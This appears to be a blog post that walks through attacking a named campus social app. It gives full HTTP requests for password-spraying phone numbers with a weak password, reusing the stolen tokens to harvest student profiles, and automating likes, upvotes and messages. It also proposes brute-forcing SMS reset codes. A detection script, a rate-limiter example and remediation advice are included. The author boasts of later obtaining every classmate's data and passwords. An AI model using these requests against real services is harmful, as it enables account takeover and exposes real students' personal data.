I actually found this vulnerability a long time ago, but I have been busy studying Metasploit and never had time to write it up. Recently I got tired of studying, so I figured I'd play with something simple instead.

Batch-scanning commonly used phone-number ranges for weak passwords found, as of publication, 66 users with weak passwords.

Scanning with Burp Suite's Intruder module:

POST request:

POST /Account/Login/index HTTP/1.1
Host: 7.dxever.applinzi.com
Proxy-Connection: keep-alive
Content-Length: 29
Accept: application/json
Origin: file://
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Linux; Android 7.0; 1 Build/LRX21V; wv) AppleWebKit/538.00 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 Html5Plus/1.0
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
Cookie: PHPSESSID=y5673ws742395bjuk33fg3267h78lbeccd
 
phone=§18812345678§&password=123456

When the password is wrong, the Response body is as follows:

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 22 Mar 2018 14:45:46 GMT
Content-Type: application/json; charset=utf8
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 200 OK
Via: 1527
Content-Length: 94
 
{"meta":{"code":"401","message":"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef\u3002"},"data":[]}

When the password is correct, the Response is:

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 22 Mar 2018 15:15:00 GMT
Content-Type: application/json; charset=utf8
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 200 OK
Via: 15146
Content-Length: 325
 
{"meta":{"code":"200","message":"\u6210\u529f"},"data":{"userid":"7181","name":"\u738b\*****","image":"http:\/\/dxever.s3.sinaapp.com\/myfiles\/*****.jpg","schoolcode":"412","type":"normal","schoolname":"\u5927\u8fde\u5de5\u4e1a\u5927\u5b66","channel":"","token":"5339ed49225be92b97de8dcb560*****"}}
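A defender-side detection for the scan described above, added here as an example and not part of the original post: it replays constructed application-log lines for the /Account/Login/index endpoint (the log format, client IPs and phone numbers are all assumed) and flags any source that submits many distinct phone numbers in a short window with mostly 401 results, which is the footprint of a fixed-password Intruder run.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: one line per login POST, with the phone the client
# submitted and the meta.code the server returned (401 = wrong credentials).
SAMPLE_LOG = """\
2018-03-22T14:45:40Z 203.0.113.7 /Account/Login/index phone=18812345670 code=401
2018-03-22T14:45:41Z 203.0.113.7 /Account/Login/index phone=18812345671 code=401
2018-03-22T14:45:41Z 203.0.113.7 /Account/Login/index phone=18812345672 code=200
2018-03-22T14:45:42Z 203.0.113.7 /Account/Login/index phone=18812345673 code=401
2018-03-22T14:45:42Z 203.0.113.7 /Account/Login/index phone=18812345674 code=401
2018-03-22T14:45:43Z 203.0.113.7 /Account/Login/index phone=18812345675 code=401
2018-03-22T14:45:50Z 198.51.100.9 /Account/Login/index phone=18899990000 code=401
2018-03-22T14:45:55Z 198.51.100.9 /Account/Login/index phone=18899990000 code=200
"""

def parse_line(line):
    ts, ip, path, phone_kv, code_kv = line.split()
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "ip": ip,
            "path": path, "phone": phone_kv.split("=", 1)[1],
            "code": code_kv.split("=", 1)[1]}

def find_spraying_sources(log_text, window=timedelta(minutes=1),
                          min_accounts=5, min_fail_ratio=0.6):
    """Return {ip: stats} for sources that tried >= min_accounts distinct
    phones inside one sliding window while mostly failing to log in."""
    events = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    by_ip = defaultdict(list)
    for e in events:
        if e["path"] == "/Account/Login/index":
            by_ip[e["ip"]].append(e)
    flagged = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:  # slide window
                start += 1
            chunk = evs[start:end + 1]
            phones = {e["phone"] for e in chunk}
            fails = sum(1 for e in chunk if e["code"] != "200")
            if len(phones) >= min_accounts and fails / len(chunk) >= min_fail_ratio:
                flagged[ip] = {"attempts": len(chunk), "accounts": len(phones),
                               "successes": len(chunk) - fails}
    return flagged
```

A single user retrying their own password (198.51.100.9) is not flagged; the spraying source is, together with the one account it got into.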

Export all of the above results in bulk, use a regular expression in Notepad++ to pull out every “token” field, set them as the Payload in Burp Suite, and send the requests in bulk:

POST /index.php/User/UserRebuild/getUserInfo HTTP/1.1
Host: 6.dxever.applinzi.com
Proxy-Connection: keep-alive
Content-Length: 38
Accept: application/json
Origin: file://
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Linux; Android 7.0; 1 Build/LRX21V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 Html5Plus/1.0
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
Cookie: PHPSESSID=504d6f5246sjox6q0032b8e5c21b4dea
 
token=$b986a358d4c02fef91b58f4de9******$

This yields the student data:

{"meta":{"code":200,"message":"\u6210\u529f"},"data":{"userData":{"name":"\u9ad8\*****\*****","image":"http:\/\/dxever.s3.sinaapp.com\/*****.jpg","sex":"\u5973","userid":"22215","bgImage":null,"grade":"2017\u7ea7","college":"\u827a\u672f\u8bbe\u8ba1\u5b66\u9662","major":""},"userInfo":{"hometown":"\u5c1a\u672a\u586b\u5199","club":"\u5c1a\u672a\u586b\u5199","circle":[],"dorm":"\u5c1a\u672a\u586b\u5199","constellation":"\u5c1a\u672a\u586b\u5199","hobby":"\u5c1a\u672a\u586b\u5199","love":"\u5c1a\u672a\u586b\u5199","writeline":"\u5c1a\u672a\u586b\u5199","channel":"cpc_22215"},"numInfo":["0","1","1","1",0,0],"album":[],"usertype":"normal","channel":""}}

After Unicode decoding, we get:

{"meta":{"code":200,"message":"成功"},"data":{"userData":{"name":"高**","image":"http:\/\/dxever.s3.sinaapp.com\/*****.jpg","sex":"女","userid":"22215","bgImage":null,"grade":"2017级","college":"艺术设计学院","major":""},"userInfo":{"hometown":"尚未填写","club":"尚未填写","circle":[],"dorm":"尚未填写","constellation":"尚未填写","hobby":"尚未填写","love":"尚未填写","writeline":"尚未填写","channel":"cpc_22215"},"numInfo":["0","1","1","1",0,0],"album":[],"usertype":"normal","channel":""}}

Export the data in bulk:

[Screenshot: 20180321221208.png, the exported data]

So what can you do with this data?

1. Mass-like on “你真好看” (“You look great”).

Set the Payload and send requests in bulk:

POST /Beautiful/Index/thinkBeautiful HTTP/1.1
Host: 7.dxever.applinzi.com
Proxy-Connection: keep-alive
Content-Length: 46
Accept: application/json
Origin: file://
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Linux; Android 7.0; 1 Build/LRX21V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 Html5Plus/1.0
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
Cookie: PHPSESSID=d99fadb5ed37731c6ce1be189cf257dc
 
token=$b986a358d4c02fef91b58f4de9******$&bid=?  // bid is obtained by capturing traffic

If you control enough users, you'll be ranked first within a few seconds.

2. Mass-upvote posts on the confession wall.

POST /index.php/CircleForum/ConfessionWowRebuild/momentsendwow HTTP/1.1
Host: 6.dxever.applinzi.com
Proxy-Connection: keep-alive
Content-Length: 56
Accept: application/json
Origin: file://
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Linux; Android 7.0; 1 Build/LRX21V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 Html5Plus/1.0
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
Cookie: PHPSESSID=504d6f5005b0866b4032b8e5c21*****
 
token=866891c39c7b2334bce7c10ad8c*****&mid=?&type=up  // mid is obtained by capturing traffic

3. Mass-send “I love you” to 黄骆俊杰.

POST /index.php/Whisper/WhisperSend/sendwhisper HTTP/1.1
Host: 6.dxever.applinzi.com
Proxy-Connection: keep-alive
Content-Length: 94
Accept: application/json
Origin: file://
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Linux; Android 7.0; 1 Build/LRX21V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 Html5Plus/1.0
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
Cookie: PHPSESSID=504d6f5005b0866b4032b8e5c21*****
 
token=866891c39c7b2334bce7c10ad8c*****&his_id=94&content=%E6%88%91%E7%88%B1%E4%BD%A0&type=text  // his_id is obtained by capturing traffic

4. Spam the conference screen at will. ......

5. Crack the password of any chat room. ......

 

Because the server places no limit on the number of requests from a single IP per unit of time, one can reasonably expect that it is also possible to:

1. Exhaustively try the 6-digit SMS verification code and reset anyone's password.

2. Post advertisements in bulk.

......

 

I don't know whether the development team will fix this vulnerability. If “大学印象” expands its customer base in the future, I hope the development team won't ignore “small vulnerabilities” like this one. The WeChat client has the same vulnerability as well; the only difference is that capturing its HTTPS traffic requires installing a CA certificate and decoding the responses.

 

Remediation suggestions:

1. Add a captcha to the password reset flow.

2. Limit concurrent requests from a single IP.

3. Require a captcha when an operation is repeated frequently.

4. Forbid setting weak passwords. (A few of the gurus on the development team use weak passwords too...)
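Suggestions 1, 2 and 4 above, implemented as an added example that is not the app's own code (the per-IP limit and window, the reset-code attempt cap and TTL, and the short weak-password list are all assumed values): a per-IP sliding-window limiter, a reset-code store that burns a code after a few wrong guesses so the 6-digit space cannot be enumerated, and a password-policy check that also rejects the user's own phone number.

```python
import hmac
import re
import time
from collections import defaultdict, deque

# Assumed policy values (not taken from the app): 20 login attempts per IP per
# minute; a 6-digit reset code allows 5 guesses and lives 5 minutes.
IP_LIMIT, IP_WINDOW = 20, 60.0
CODE_MAX_TRIES, CODE_TTL = 5, 300.0
WEAK_PASSWORDS = {"123456", "123456789", "111111", "password", "12345678"}

class IpRateLimiter:
    """Sliding-window request counter keyed by client IP (suggestion 2)."""
    def __init__(self, limit=IP_LIMIT, window=IP_WINDOW):
        self.limit, self.window = limit, window
        self.hits = defaultdict(deque)   # ip -> timestamps inside the window

    def allow(self, ip, now=None):
        now = time.monotonic() if now is None else now
        q = self.hits[ip]
        while q and now - q[0] > self.window:   # drop expired timestamps
            q.popleft()
        if len(q) >= self.limit:
            return False      # caller answers 429 or demands a captcha
        q.append(now)
        return True

class ResetCodeStore:
    """SMS reset codes with an attempt cap and expiry (suggestion 1)."""
    def __init__(self):
        self.codes = {}       # phone -> [code, tries_left, expires_at]

    def issue(self, phone, code, now):
        self.codes[phone] = [code, CODE_MAX_TRIES, now + CODE_TTL]

    def verify(self, phone, guess, now):
        entry = self.codes.get(phone)
        if entry is None or now > entry[2]:
            return False
        entry[1] -= 1
        ok = hmac.compare_digest(guess, entry[0])   # constant-time compare
        if ok or entry[1] == 0:
            del self.codes[phone]   # single use, or burned after too many guesses
        return ok

def password_is_acceptable(pw, phone):
    """Suggestion 4: reject dictionary words, repeats, runs and the phone itself."""
    return (len(pw) >= 8 and pw not in WEAK_PASSWORDS and phone not in pw
            and not re.fullmatch(r"(.)\1*|0?12345678?9?", pw))
```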

Follow-up: I found more vulnerabilities and successfully obtained the information of every student in my year, including their academic affairs office passwords. I have no idea how it reached my counselor; it stopped just short of me being called in for a chat...